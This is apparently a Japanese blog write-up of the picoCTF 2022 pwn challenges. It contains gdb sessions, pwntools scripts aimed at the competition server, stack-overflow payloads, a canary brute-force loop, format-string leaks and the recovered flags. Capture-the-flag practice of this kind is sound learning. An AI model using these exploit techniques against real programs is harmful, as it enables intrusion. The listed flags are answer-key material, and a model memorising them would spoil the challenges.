![picoCTF 2022 writeup[pwn]](/content/images/size/w2000/2022/03/------4.PNG)
picoCTF 2022 writeup[pwn]
問題ファイルや私がかいたソルバは()にあります。
basic-file-exploit (100pts)
配布されたプログラムを見ると、data_read()関数では受け取ったentry_numberから1引いた数を用いてdataから文字列を取ってきています。そして、global変数の並びは
static const char* flag = "[REDACTED]";
static char data[10][100];
なので、entry_numberに0を入れればdata_read()関数で読まれるデータはdata[-1]、すなわちflagになりそうな気がします。実際なるので勝ちです。
picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_25D6CDDB}
buffer overflow 0 (100pts)
配布されたプログラムを見ると分かる通り、この問題ではbuffer overflowさせてSIGSEGVを発生させるとflagを出してくれます。適当にFLAGSIZE_MAX、つまり64文字を超える長さの入力をしてbuffer overflowさせればよいです。
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}
CVE-XXXX-XXXX (100pts)
はじめてWindowsの印刷スプーラーのRCEに関する脆弱性が報告されたのはCVE-2021-34527らしいです。がんばって検索しましょう.
picoCTF{CVE-2021-34527}
buffer overflow 1 (200pts)
vuln()関数内のgets(buf)の脆弱性を使ってwin()関数を呼ぼう、という問題です。
まずは適当に文字列を生成してbuffer overflowさせ、レジスタの書きかわりの様子を見ます。
gdb-peda$ pattern_create 80
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4A'
gdb-peda$ run
Starting program: /home/altair626/workspace/picoctf2022/binary/buffer_overflow_1/vuln
Please enter your string:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4A
Okay, time to return... Fingers Crossed... Jumping to 0x41414641
Program received signal SIGSEGV, Segmentation fault.
[--------------------------------------registers--------------------------------------]
EAX: 0x41 (b'A')
EBX: 0x61414145 (b'EAAa')
ECX: 0x41 (b'A')
EDX: 0xf7fb8890 --> 0x0
ESI: 0xf7fb7000 --> 0x1d4d8c
EDI: 0x0
EBP: 0x41304141 (b'AA0A')
ESP: 0xffffcfc0 ("bAA1AAGAAcAA2AA"...)
EIP: 0x41414641 (b'AFAA')
[----------------------------------------code-----------------------------------------]
Invalid $PC address: 0x41414641
[----------------------------------------stack----------------------------------------]
Display various information of current execution context
Usage:
context [reg,code,stack,all] [code/stack length]
0x41414641 in ?? ()
EIPレジスタが0x41414641 (b'AFAA')に書き換わっていますね。よって、入力した文字列のAFAAの部分をwin()のアドレスに換えればwin()を呼んでくれそうです。
gdb-peda$ patto AFAA
AFAA found at offset: 44
gdb-peda$ x win
0x80491f6 <win>: "\363\017\036\373U\211\345S\203\354T\350*\377\377"...
ですから、適当に44文字入れたあと、\xf6\x91\x04\x08を入れればよいです(リトルエンディアンに注意)。
from pwn import *
r = remote('saturn.picoctf.net', 61044, level = 'debug')
inp = "A"*44 + "\xf6\x91\x04\x08"
print(r.recvline())
r.sendline(inp)
print(r.recvline())
print(r.recvline())
picoCTF{addr3ss3s_ar3_3asy_60fac6aa}
RPS (200pts)
じゃんけんに連勝するとflagがもらえるプログラムです。よ~く見ると入力をrockpaperscissorsにすれば絶対勝ててしまうバグがあるのでそれをするだけです。
picoCTF{50M3_3X7R3M3_1UCK_32F730C2}
x-sixty-what (200pts)
x64でbuffer overflow 1と同様のbuffer overflowによるRIPの書き換えをする問題です。
x64でpwnするときの注意点の「リターンアドレス」の節で言われているように、x64では雑にbuffer overflowさせるとRIPは書き換わらず、スタックの様子を見に行く必要があるようです。
gdb-peda$ pattern_create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ run
Starting program: /home/altair626/workspace/picoctf2022/binary/x-sixty-what/vuln
Welcome to 64-bit. Give me a string that gets you the flag:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------------------registers-----------------------------------------------]
RAX: 0x7fffffffde20 ("AAA%AAsAABAA$AA"...)
RBX: 0x0
RCX: 0x7ffff7dcda00 --> 0xfbad2288
RDX: 0x7ffff7dcf8d0 --> 0x0
RSI: 0x4052c4 --> 0xa (b'\n')
RDI: 0x7fffffffde84 --> 0x7f00
RBP: 0x4141334141644141 (b'AAdAA3AA')
RSP: 0x7fffffffde68 ("IAAeAA4AAJAAfAA"...)
RIP: 0x4012d1 (<vuln+31>: ret)
R8 : 0x4052c5 --> 0x0
R9 : 0x0
R10: 0x405010 --> 0x0
R11: 0x7ffff7b9eda0 --> 0xfffb14c0fffb12f8
R12: 0x401150 (<_start>: endbr64)
R13: 0x7fffffffdf70 --> 0x1
R14: 0x0
R15: 0x0
[-------------------------------------------------code-------------------------------------------------]
Display various information of current execution context
Usage:
context [reg,code,stack,all] [code/stack length]
0x00000000004012d1 in vuln ()
gdb-peda$ info frame
Stack level 0, frame at 0x7fffffffde68:
rip = 0x4012d1 in vuln; saved rip = 0x4134414165414149
called by frame at 0x7fffffffde78
Arglist at 0x7fffffffde60, args:
Locals at 0x7fffffffde60, Previous frame's sp is 0x7fffffffde70
Saved registers:
rip at 0x7fffffffde68
スタックを見るとsaved rip = 0x4134414165414149 (リトルエンディアンなので、IAAeAA4A)です。よって、
gdb-peda$ patto IAAeAA4A
IAAeAA4A found at offset: 72
gdb-peda$ x flag
0x401236 <flag>: 0xe5894855fa1e0ff3
より、IAAeAA4Aがあった73~80文字目を0x0000000000401236に書き換えれば勝ちです。
from pwn import *
r = remote('saturn.picoctf.net', 61658, level = 'debug')
inp = "A"*72 + "\x3b\x12\x40\x00\x00\x00\x00\x00"
print(r.recvline())
r.sendline(inp)
print(r.recvline())
print(r.recvline())
picoCTF{b1663r_15_b3773r_011d4bd8}
buffer overflow 2 (300pts)
buffer overflowによりwin()を呼ぶのですが、引数1が0xCAFEF00D、引数2が0xF00DF00Dになっていなければいけません。これを実現するためには、書き換えたあとのstackが
[lower address]
| ... |
+-------------------------+
ebp -> | address of win() | 0x08049296
+-------------------------+
| return address of win() | なんでもいい
+-------------------------+
| argument 1 | 0xcafef00d
+-------------------------+
| argument 2 | 0xf00df00d
+-------------------------+
| ... |
[higher address]
となっていればよいです。gdbで調べるとeipに書かれる位置は113-116文字目、win()のアドレスは0x08049296なので、入力すべきバイナリは
"A"*112 + "\x96\x92\x04\x08BBBB\x0d\xf0\xfe\xca\x0d\xf0\x0d\xf0"
となります。
picoCTF{b1663r_15_b3773r_011d4bd8}
buffer overflow 3 (300pts)
stack canaryを書き換えないようにbuffer overflowをする必要があります。しかしリモートマシンで動いているプログラムで設定されているcanaryの値がわからないので、推測する必要があります。
canaryを1文字でも書き換えると***** Stack Smashing Detected *****というエラーメッセージが出るので、1文字だけ書き換わるような入力を繰り返してエラーメッセージがでないときの文字が正解であるとわかります。以下のようにcanaryを当てるプログラムを書きました。
from pwn import *
inp = "s"*64
for _ in range(4):
for i in range(20, 128):
r = remote('saturn.picoctf.net', 63460)
estimated_inp = inp + chr(i)
r.recvline()
r.sendline(str(len(estimated_inp)))
r.sendline(estimated_inp)
ret = r.recvline()
if "Stack Smashing" not in str(ret):
print("get chr of canary:", i)
break
inp += chr(i)
print(inp)
r = remote('saturn.picoctf.net', 63460, level = 'debug')
inp += "A"*16 + "\x36\x93\x04\x08"
r.recvline()
r.sendline(str(len(inp)))
r.sendline(inp)
print(r.recvline())
print(r.recvline())
canaryはBiRdでした。
picoCTF{Stat1C_c4n4r13s_4R3_b4D_f7c1f50a}
flag leak (300pts)
scanf("%127s", story);で読んだ文字列をそのままprintf(story);と書式を指定せずに使っています。書式文字列攻撃をしたくなりますね。%p%p%p%p...%p%p%p%p%p%p%p%pと%pをたくさん入力してstackの中身を吐き出させると
0xff9640300xff9640500x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x2570250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x655f6b630x346239620x7d3261360xfbad20000xfba3fd00(nil)0xf7fb09900x804c0000x8049410(nil)0x804c0000xff9641180x80494180x20xff9641c40xff9641d0(nil)0xff964130(nil)(nil)0xf7da6ee5
という出力がでて、このうちascii文字がかたまっている0x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x655f6b630x346239620x7d326136の部分がflagになっています。
picoCTF{L34k1ng_Fl4g_0ff_St4ck_eb9b46a2}
wine (300pts)
exeファイルが渡されますが、やることはbuffer overflow 1と同じくbuffer overflowによるeipの書き換えです。ollydbgをつかって解析すると、入力文字列のうちeipに書かれる部分のoffsetは140、win()関数のアドレスは0x00401530なので、入力すべきバイナリは
inp = "x" * 140 + "\x30\x15\x40\x00"です。
picoCTF{Un_v3rr3_d3_v1n_bb39a2a4}
function overwrite (400pts)
fun[num1] += num2;という操作を上手に使ってglobal変数のcheckの値をhard_checker()の関数アドレスからeasy_checker()の関数アドレスに書き換えます。
funのアドレスは0x0804c080、checkのアドレスは0x0804c040で差が64バイトなので、num1を-16にすればよいです。
また、hard_checker()のアドレスは0x08049436、easy_checker()のアドレスは0x080492fcで差が314なので、num2は-314にすればよいです。
story_scoreが1337になる文字列の一つにaaaaaaaaaaaaaLがあるので、
aaaaaaaaaaaaaL
-16 -314
を順に入力すればflagが手に入ります。
picoCTF{0v3rwrit1ng_P01nt3rs_f61460f0}
stack cache (400pts)
win()を呼んでflagを読ませてからUnderConstruction()を呼ぶとUnderConstruction()中のprintfが良い感じにflagを吐いてくれそうな気がします。
win()のアドレスが0x08049da0、UnderConstruction()のアドレスが0x08049e20なので、
inp = "xxxxxxxxxxxxxx\xa0\x9d\x04\x08\x20\x9e\x04\x08"
を送るとflagを手に入れることができました。
picoCTF{Cle4N_uP_M3m0rY_9bd1733a}